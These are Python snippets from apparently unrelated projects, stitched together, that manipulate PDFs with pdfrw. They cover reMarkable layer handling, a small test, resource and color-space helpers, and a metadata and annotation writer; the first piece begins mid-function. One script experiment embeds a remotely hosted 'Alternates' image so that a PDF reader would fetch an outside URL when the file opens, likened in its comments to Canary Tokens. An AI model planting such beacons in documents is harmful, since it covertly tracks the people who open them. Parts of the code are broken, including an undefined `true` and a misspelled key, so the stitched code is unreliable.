            re.findall(r'(\/Im[0-9]+)\s', stream[:template_endpos])

        # Page ocg
        stream = rmpage.Contents.stream[:page_inatpos]
        stream += '/OC /ocgpage BDC\n'
        stream += rmpage.Contents.stream[page_inatpos:]
        stream += 'EMC\n'
        # Save stream
        rmpage.Contents.stream = stream

    # Find all other vector layers using the magic
    # point (DocumentPageLayer.render_to_painter()).
    # ?? Why is this a half-point off ??
    while True:
        m = re.search('420.500000 69 m\n', rmpage.Contents.stream)
        if not m:
            break
        layerid = 'ocglayer{}'.format(len(vector_layers) + 1)
        # Replace the marker with the opening of a new layer
        stream = rmpage.Contents.stream[:m.start()]
        if len(vector_layers):
            # close previous layer
            stream += 'EMC\n'
        stream += '/OC /{} BDC\n'.format(layerid)
        stream += rmpage.Contents.stream[m.end():]
        vector_layers.append(layerid)
        rmpage.Contents.stream = stream
    # If we added vector layers, have to end the
    # first one.
    if len(vector_layers):
        stream = rmpage.Contents.stream + 'EMC\n'
        rmpage.Contents.stream = stream

    # Done--recompress the stream.
    compress.compress([rmpage.Contents])

    # There shouldn't be any Properties there since we
    # generated the rmpage ourselves, so don't bother
    # checking.
    rmpage.Resources.Properties = PdfDict(ocgpage=ocgpage)
    if not uses_base_pdf:
        rmpage.Resources.Properties.ocgtemplate = ocgtemplate

    # Add individual OCG layers (Bitmap)
    was_vector = True
    for n, key in enumerate(rmpage.Resources.XObject):
        if str(key) in template_xobj_keys:
            continue
        was_vector = False
        l = n - len(template_xobj_keys)
        # This would indicate a bug in the handling of a
        # notebook.
        try:
            layer = annotations[i][l]
        except Exception:
            log.error(
                'could not associate XObject with layer: (i, l) ({}, {})'.
                format(i, l))
            log.error(str(annotations))
            # Format the message before logging it; calling .format() on
            # the result of log.error() raises inside this handler.
            log.error('document: {} ()'.format('uuid', 'self.visible_name'))
            continue
        layername = layer[0]
        ocg = IndirectPdfDict(Type=PdfName('OCG'), Name=layername)
        ocgprop.OCGs.append(ocg)
        ocgorderinner.append(ocg)
        rmpage.Resources.XObject[key].OC = ocg

    # Add individual OCG layers (Vector)
    if was_vector:
        for l, layerid in enumerate(vector_layers):
            # This would indicate a bug in the handling of a
            # notebook.
            try:
                layer = annotations[i][l]
            except Exception:
                log.error(
                    'could not associate layerid with layer: (i, l, layerid) ({}, {}, {})'
                    .format(i, l, layerid))
                log.error(
                    'document: {} ()'.format('uuid', 'self.visible_name'))
                log.error(str(annotations))
                continue
            layername = layer[0]
            ocg = IndirectPdfDict(Type=PdfName('OCG'), Name=layername)
            ocgprop.OCGs.append(ocg)
            ocgorderinner.append(ocg)
            rmpage.Resources.Properties[PdfName(layerid)] = \
                ocg

    # Add order of OCGs to primary document
    ocgprop.D.Order.append(ocgpage)
    ocgprop.D.Order.append(ocgorderinner)

    return ocgorderinner
def test_blank(self):
    """A default GraphicsState serializes to a dict holding only /Type."""
    blank_dict = GraphicsState().as_pdf_dict()
    entry_count = len(blank_dict)
    assert entry_count == 1
    assert blank_dict.Type == PdfName('ExtGState')
def add_additional_resources(self, resources):
    """Install this annotation's font as the ``/Font`` entry of ``resources``.

    Any existing ``/Font`` entry is replaced by a new dictionary holding a
    single font, keyed by ``PDF_ANNOTATOR_FONT``.
    """
    fonts = PdfDict()
    font_key = PdfName(PDF_ANNOTATOR_FONT)
    fonts[font_key] = self.make_font_object()
    resources[PdfName('Font')] = fonts
# Experiment: attach an externally hosted alternate image to an existing
# image XObject and write the first page to 'out.pdf'.
# NOTE(review): `img_kid`, `pdf_kid` and `pdf` are not defined in this part
# of the script - presumably set up earlier; confirm.
# NOTE(review): the key is spelled `SubType`; other image dictionaries use
# `Subtype` - confirm whether this spelling is intended.
alt_img = PdfDict(Type=PdfName.XObject, SubType=PdfName.Image,
                  BitsPerComponent=8, ColorSpace=PdfName.DeviceRGB,
                  Height=800, Width=600, Length=0,
                  F=PdfDict(FS=PdfName.URL,
                            F='https://chezsoi.org/lucas/ThePatch.jpg'),
                  FFilter=PdfName.DCTDecode)
# NOTE(review): lowercase `true` is not a Python builtin; it must be defined
# earlier in the script or this line raises NameError - confirm.
alt_img.indirect = true
alternates = PdfArray([PdfDict(DefaultForPrinting=True, Image=alt_img)])
alternates.indirect = true

# Hook the alternates array onto the existing image and make that image the
# only XObject in the page resources.
img_name = PdfName('Image-9960')
img = img_kid.Resources.XObject[img_name]
img.Alternates = alternates
pdf_kid.Resources.XObject = PdfDict()
pdf_kid.Resources.XObject[img_name] = img

out = PdfWriter()
out.addpage(pdf.pages[0])
out.write('out.pdf')

# CONCLUSION: neither the Adobe nor the Sumatra reader visits the link...
# It may be that readers no longer follow this "Alternates" image spec, that
# HTTPS is not supported, or that I made a mistake in the resulting PDF.
# Anyway, I'm giving up.
# However, Canary Tokens use a similar technique that works well (with Adobe,
# not Sumatra): https://github.com/sumatrapdfreader/sumatrapdf/issues/1696
def _get_color_space_name(image):
    """Map the mode of ``image`` to the matching PDF color space name.

    :returns PdfName: ``DeviceRGB`` for ``RGB_MODE``, ``DeviceGray`` for
        ``GRAYSCALE_MODE`` and ``SINGLE_CHANNEL_MODE``.
    :raises ValueError: for any other mode.
    """
    mode = image.mode
    if mode == RGB_MODE:
        space = 'DeviceRGB'
    elif mode in (GRAYSCALE_MODE, SINGLE_CHANNEL_MODE):
        space = 'DeviceGray'
    else:
        raise ValueError('Image color space not yet supported')
    return PdfName(space)
def write_pdf_metadata(document, fileobj, scale, metadata, attachments,
                       url_fetcher):
    """Append to a seekable file-like object to add PDF metadata.

    The PDF already present in ``fileobj`` is read back, enriched and then
    rewritten in place.  In order, this adds: the outline (bookmarks),
    embedded file attachments, link and file-attachment annotations, the
    document information entries, and per-page TrimBox / BleedBox.

    :param document: rendered document; its ``pages`` supply ``bleed``.
    :param fileobj: seekable file-like object holding the PDF; overwritten.
    :param scale: forwarded to ``prepare_metadata``.
    :param metadata: object providing ``attachments``, ``title``,
        ``description``, ``generator``, ``authors``, ``keywords``,
        ``created`` and ``modified``.
    :param attachments: extra attachments, or a falsy value for none.
    :param url_fetcher: forwarded to ``_create_pdf_attachment``.
    """
    fileobj.seek(0)
    trailer = PdfReader(fileobj)
    pages = trailer.Root.Pages.Kids

    bookmarks, links = prepare_metadata(document, scale, pages)
    if bookmarks:
        bookmark_objects, count = create_bookmarks(bookmarks, pages)
        trailer.Root.Outlines = PdfDict(Type=PdfName('Outlines'),
                                        Count=count,
                                        First=bookmark_objects[0],
                                        Last=bookmark_objects[-1])

    # Document-level attachments: those from the metadata come first
    attachments = metadata.attachments + (attachments or [])
    if attachments:
        embedded_files = []
        for attachment in attachments:
            attachment_object = _create_pdf_attachment(attachment,
                                                       url_fetcher)
            # Attachments that could not be loaded are silently left out
            if attachment_object is not None:
                # The array alternates between a name and its file spec
                embedded_files.append(PdfString.encode('attachment'))
                embedded_files.append(attachment_object)
        if embedded_files:
            trailer.Root.Names = PdfDict(EmbeddedFiles=PdfDict(
                Names=PdfArray(embedded_files)))

    # A single link can be split in multiple regions. We don't want to embed
    # a file multiple times of course, so keep a reference to every embedded
    # URL and reuse the object number.
    # TODO: If we add support for descriptions this won't always be correct,
    # because two links might have the same href, but different titles.
    annot_files = {}
    for page_links in links:
        for link_type, target, rectangle in page_links:
            if link_type == 'attachment' and target not in annot_files:
                # TODO: use the title attribute as description
                annot_files[target] = _create_pdf_attachment((target, None),
                                                             url_fetcher)

    # TODO: splitting a link into multiple independent rectangular annotations
    # works well for pure links, but rather mediocre for other annotations and
    # fails completely for transformed (CSS) or complex link shapes (area).
    # It would be better to use /AP for all links and coalesce link shapes that
    # originate from the same HTML link. This would give a feeling similar to
    # what browsers do with links that span multiple lines.
    for page, page_links in zip(pages, links):
        annotations = PdfArray()
        for link_type, target, rectangle in page_links:
            # Attachment links whose file could not be loaded fall back to a
            # plain URI link
            if link_type != 'attachment' or annot_files[target] is None:
                annotation = PdfDict(Type=PdfName('Annot'),
                                     Subtype=PdfName('Link'),
                                     Rect=PdfArray(rectangle),
                                     Border=PdfArray((0, 0, 0)))
                if link_type == 'internal':
                    destination = (target[0], PdfName('XYZ'), target[1],
                                   target[2], 0)
                    annotation.A = PdfDict(Type=PdfName('Action'),
                                           S=PdfName('GoTo'),
                                           D=PdfArray(destination))
                else:
                    annotation.A = PdfDict(Type=PdfName('Action'),
                                           S=PdfName('URI'),
                                           URI=PdfString.encode(
                                               iri_to_uri(target)))
            else:
                assert annot_files[target] is not None
                ap = PdfDict(N=PdfDict(BBox=PdfArray(rectangle),
                                       Subtype=PdfName('Form'),
                                       Type=PdfName('XObject')))
                # evince needs /T or fails on an internal assertion. PDF
                # doesn't require it.
                annotation = PdfDict(Type=PdfName('Annot'),
                                     Subtype=PdfName('FileAttachment'),
                                     T=PdfString.encode(''),
                                     Rect=PdfArray(rectangle),
                                     Border=PdfArray((0, 0, 0)),
                                     FS=annot_files[target],
                                     AP=ap)
            annotations.append(annotation)

        if annotations:
            page.Annots = annotations

    # Document information dictionary
    trailer.Info.Producer = VERSION_STRING
    # Single-valued text entries are copied as they are
    for attr, key in (('title', 'Title'), ('description', 'Subject'),
                      ('generator', 'Creator')):
        value = getattr(metadata, attr)
        if value is not None:
            setattr(trailer.Info, key, value)
    # Multi-valued entries are joined with ', '
    for attr, key in (('authors', 'Author'), ('keywords', 'Keywords')):
        value = getattr(metadata, attr)
        if value is not None:
            setattr(trailer.Info, key, ', '.join(getattr(metadata, attr)))
    # Dates are converted with w3c_date_to_pdf; a None result is skipped
    for attr, key in (('created', 'CreationDate'), ('modified', 'ModDate')):
        value = w3c_date_to_pdf(getattr(metadata, attr), attr)
        if value is not None:
            setattr(trailer.Info, key, value)

    for page, document_page in zip(pages, document.pages):
        left, top, right, bottom = (float(value) for value in page.MediaBox)
        # Convert pixels into points
        bleed = {
            key: value * 0.75
            for key, value in document_page.bleed.items()
        }

        trim_left = left + bleed['left']
        trim_top = top + bleed['top']
        trim_right = right - bleed['right']
        trim_bottom = bottom - bleed['bottom']
        page.TrimBox = PdfArray((trim_left, trim_top, trim_right,
                                 trim_bottom))

        # Arbitrarily set PDF BleedBox between CSS bleed box (PDF MediaBox)
        # and CSS page box (PDF TrimBox), at most 10 points from the TrimBox.
        bleed_left = trim_left - min(10, bleed['left'])
        bleed_top = trim_top - min(10, bleed['top'])
        bleed_right = trim_right + min(10, bleed['right'])
        bleed_bottom = trim_bottom + min(10, bleed['bottom'])
        page.BleedBox = PdfArray(
            (bleed_left, bleed_top, bleed_right, bleed_bottom))

    # Overwrite the file from the start and drop any leftover tail
    fileobj.seek(0)
    PdfWriter().write(fileobj, trailer=trailer)
    fileobj.truncate()